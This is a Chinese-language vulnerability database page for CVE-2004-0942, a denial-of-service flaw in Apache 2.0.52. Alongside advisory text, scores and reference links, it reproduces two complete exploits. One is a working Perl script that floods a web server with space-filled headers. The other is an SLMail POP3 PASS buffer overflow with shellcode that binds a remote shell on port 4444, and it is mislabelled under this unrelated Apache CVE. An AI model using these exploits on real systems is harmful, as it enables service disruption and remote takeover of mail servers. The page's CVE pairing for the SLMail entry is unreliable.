CVE-2004-0942
CVSS5.0
发布时间 :2005-02-09 00:00:00
修订时间 :2016-10-17 22:50:03
NMCOEP    

[原文]Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.


[CNNVD]Apache Web Server空字符处理远程拒绝服务漏洞(CNNVD-200502-041)

        Apache Web Server是一款HTTP服务程序。
        Apache Web Server不正确处理包含多个空格符号的请求,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        Chintan Trivedi报告远程攻击者可以发送多个特殊构建的包含多个空格符号的HTTP GET请求,可导致WEB服务器消耗大量资源而造成拒绝服务。
        供应商后来报告字段长度限制不能很好的防止部分恶意请求造成的危害。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10962Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MI...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0942
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-041
(官方数据源) CNNVD

- 其它链接及资源

http://lists.apple.com/archives/security-announce/2005//Aug/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2005-08-17
http://lists.apple.com/archives/security-announce/2005/Aug/msg00000.html
(UNKNOWN)  APPLE  APPLE-SA-2005-08-15
http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/028248.html
(UNKNOWN)  FULLDISC  20041101 DoS in Apache 2.0.52 ?
http://marc.info/?l=bugtraq&m=110384374213596&w=2
(UNKNOWN)  HP  SSRT4876
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1
(UNKNOWN)  SUNALERT  102198
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.mandriva.com/security/advisories?name=MDKSA-2004:135
(UNKNOWN)  MANDRAKE  MDKSA-2004:135
http://www.redhat.com/support/errata/RHSA-2004-562.html
(UNKNOWN)  REDHAT  RHSA-2004:562
http://www.trustix.org/errata/2004/0061/
(UNKNOWN)  TRUSTIX  2004-0061
http://www.vupen.com/english/advisories/2006/0789
(UNKNOWN)  VUPEN  ADV-2006-0789
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01123
(UNKNOWN)  HP  HPSBUX01123
http://xforce.iss.net/xforce/xfdb/17930
(VENDOR_ADVISORY)  XF  apache-http-get-dos(17930)

- 漏洞信息

Apache Web Server空字符处理远程拒绝服务漏洞
中危 资料不足
2005-02-09 00:00:00 2005-10-20 00:00:00
远程※本地  
        Apache Web Server是一款HTTP服务程序。
        Apache Web Server不正确处理包含多个空格符号的请求,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        Chintan Trivedi报告远程攻击者可以发送多个特殊构建的包含多个空格符号的HTTP GET请求,可导致WEB服务器消耗大量资源而造成拒绝服务。
        供应商后来报告字段长度限制不能很好的防止部分恶意请求造成的危害。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://httpd.apache.org/

- 漏洞信息 (855)

Apache <= 2.0.52 HTTP GET request Denial of Service Exploit (EDBID:855)
multiple dos
2005-03-04 Verified
0 GreenwooD
N/A [点击下载]
#!/usr/bin/perl

# Based on -> 
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#   
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added future with we can exploit Apache web servers on windows system. For it you should experiment
#             with [trys] parameter of this code.
#             
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to 
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->    
#           
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see "Eror 500" you are lucky man :)
#
# Warnings -> 
#             This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
#             use it for attack, or others things.  
#
# Shit -> 
#             My English now is bulls shit :( I try study it :)
#            

# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)

# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV <1)
  {
   print "\n ::: ---------------------------------------------- :::\n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n";
   print " ::: Coded by GreenwooD from Network Security Team  :::\n";
   print " ::: ---------------------------------------------- :::\n";
   exit();
  }

print "\n <+> Prepare to start connect.\n";

$s = IO::Socket::INET->new(Proto=>"tcp",
                            PeerAddr=>$ARGV[0],
                            PeerPort=>80,
                            Timeout=>6
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
  $s->autoflush();

print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";    
  
  print $s "GET / HTTP/1.0\n";

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";    
print " <SOD> |";

$i=0;

 do {

     print $s (" " x 8000 . "\n"); 

   
      if ($i % 500 == 0)
        { 
         print "=";
        }  

     ++$i;

    } until ($i == $trys); 


print "> <EOD>\n";

close($s);

print " <+> Ok now target web server maybe DoSeD.\n"; 

# milw0rm.com [2005-03-04]
		

- 漏洞信息 (F35097)

slmail5x.txt (PacketStormID:F35097)
2004-11-20 00:00:00
muts  whitehat.co.il
exploit,remote,overflow,shell
windows,2k
CVE-2004-0942
[点击下载]

SLMail 5.x POP3 remote PASS buffer overflow exploit that binds a shell to port 4444. Tested on Windows 2000 SP4.

SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942

INTRO:

SLMail Pro is web-based POP3 and SMTP email server software for MicrosoftT 
Windows 2000 that includes advanced features usually found in 
enterprise-level systems.
Seattlelab has been providing businesses with an alternative to expensive 
email server software for 10 years. Because of its stability, features, and 
price, SLMail Pro has created a niche in a competitive market, proving there 
is no need to spend a small fortune to implement a secure, full-featured 
email server solution.



PoC:

######################################
#                                                                        #
# SLmail 5.5 POP3 PASS Buffer Overflow                  #
# Discovered by : Muts                                          #
# Coded by : Muts                                                #
# WWW.WHITEHAT.CO.IL                                      #
# Plain vanilla stack overflow in the PASS command  #
#                                                                        #
######################################
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py            #
######################################
# D:\Projects\BO>nc -v 192.168.1.167 4444            #
# localhost.lan [192.168.1.167] 4444 (?) open         #
# Microsoft Windows 2000 [Version 5.00.2195]         #
# (C) Copyright 1985-2000 Microsoft Corp.               #
# C:\Program Files\SLmail\System>                        #
######################################

import struct
import socket

print "\n\n############################"
print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!"
print "\n\n############################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
try:
	print "\nSending evil buffer..."
	s.connect(('192.168.1.167',110))
	data = s.recv(1024)
	s.send('USER username' +'\r\n')
	data = s.recv(1024)
	s.send('PASS ' + buffer + '\r\n')
	data = s.recv(1024)
	s.close()
	print "\nDone! Try connecting to port 4444 on victim machine."
except:
	print "Could not connect to POP3!"Regards to muts and WHSupport the Whoppix 
project:http://whoppix.net/ 

    

- 漏洞信息 (F35049)

apache-squ1rt.c (PacketStormID:F35049)
2004-11-18 00:00:00
Daniel Guido  
exploit,remote,denial of service
CVE-2004-0942
[点击下载]

Apache v2.0.52 remote denial of service exploit (version two) which sends a lot of spaces, consuming CPU and RAM. More information available here. Versions between 2.0.35 and 2.0.52 may be vulnerable, but only v2.0.50 through 2.0.52 was tested.

- 漏洞信息

11391
Apache HTTP Server Header Parsing Space Saturation DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Apache contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends specially crafted requests with a large amount of overly long headers comprised only of spaces, and will result in loss of availability for the server.

- 时间线

2004-11-01 Unknow
2004-11-01 Unknow

- 解决方案

Upgrade to version 2.0.53-dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站